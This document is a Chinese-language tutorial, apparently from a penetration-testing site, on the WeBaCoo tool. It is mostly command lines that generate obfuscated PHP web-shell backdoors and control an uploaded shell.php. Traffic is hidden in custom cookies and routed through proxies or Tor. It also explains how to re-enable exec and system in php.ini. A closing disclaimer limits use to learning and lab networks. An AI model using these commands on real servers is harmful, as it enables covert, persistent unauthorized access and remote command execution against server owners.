使用默认配置生成模糊的后门代码
- webacoo -g -o shell.php
使用exec有效载荷混淆后门代码
- webacoo -g -o shell_1.php -f 3
使用popen有效载荷生成原始后门
- webacoo -g -o shell_2.php -f 5 -r
使用终端模式连接后门
1,默认参数 -u 访问服务器
- webacoo -t -u http://192.168.106.131/template/upload/shell.php
2,将Test-cookie 作为cookie名称,TtT作为分隔符,访问服务器
- webacoo -t -u http://192.168.106.131/template/upload/shell.php -c “Test-cookie” -d “TtT”
3,将Test-cookie2 作为cookie 名称,TtT作为分隔符,使用代理服务器10.0.1.5:8081访问服务器
- webacoo -t -u http://192.168.106.131/template/upload/shell.php -c “Test-cookie2” -d “TtT” -p 10.0.1.5:8081
4,将My-cookie 作为cookie名称,使用tor代理网络访问后门
- webacoo -t -uhttp://192.168.106.131/template/upload/shell.php -c “My-cookie” -p tor
使用技巧
1,在Windows环境下需要php程序支持相应的函数,可以在php.ini文件中设置disable_functions,取消禁用函数exec,system,passthru,shell_exec,示例如下
disable_functions=escapeshellarg,escapeshellcmd,proc_close,proc_open,dll,popen,show_source
通过https代理支持,配合Burp Site等工具实现。
webacoo -t -u http://192.168.106.131/template/upload/shell.php -p 127.0.0.1:8080
webacoo -t -u https://192.168.106.131/template/upload/shell.php -p 127.0.0.1:8080
2,在非ubantu环境下,需要liburi-perl,libio-socket-socks-perl组件的支持
在局域网环境进行,切勿用于非法用途
声明:
切勿使用在本网站学习的方法计算机,保护网络安全,人人有责,做一个维护网络安全的人。
该网站编写此类文章的目标是为了让渗透测试爱好者在学习过程中更好的掌握技巧和方法同时也让广大网民了解黑客是如何对互联网进行攻击的从而更好的保护网络财产安全,如果使用在本站学习的方法和技巧攻击其他计算机的造成的后果自负,与本站无关,学技术不是为了搞破坏,而是为了更好祖国的网络全!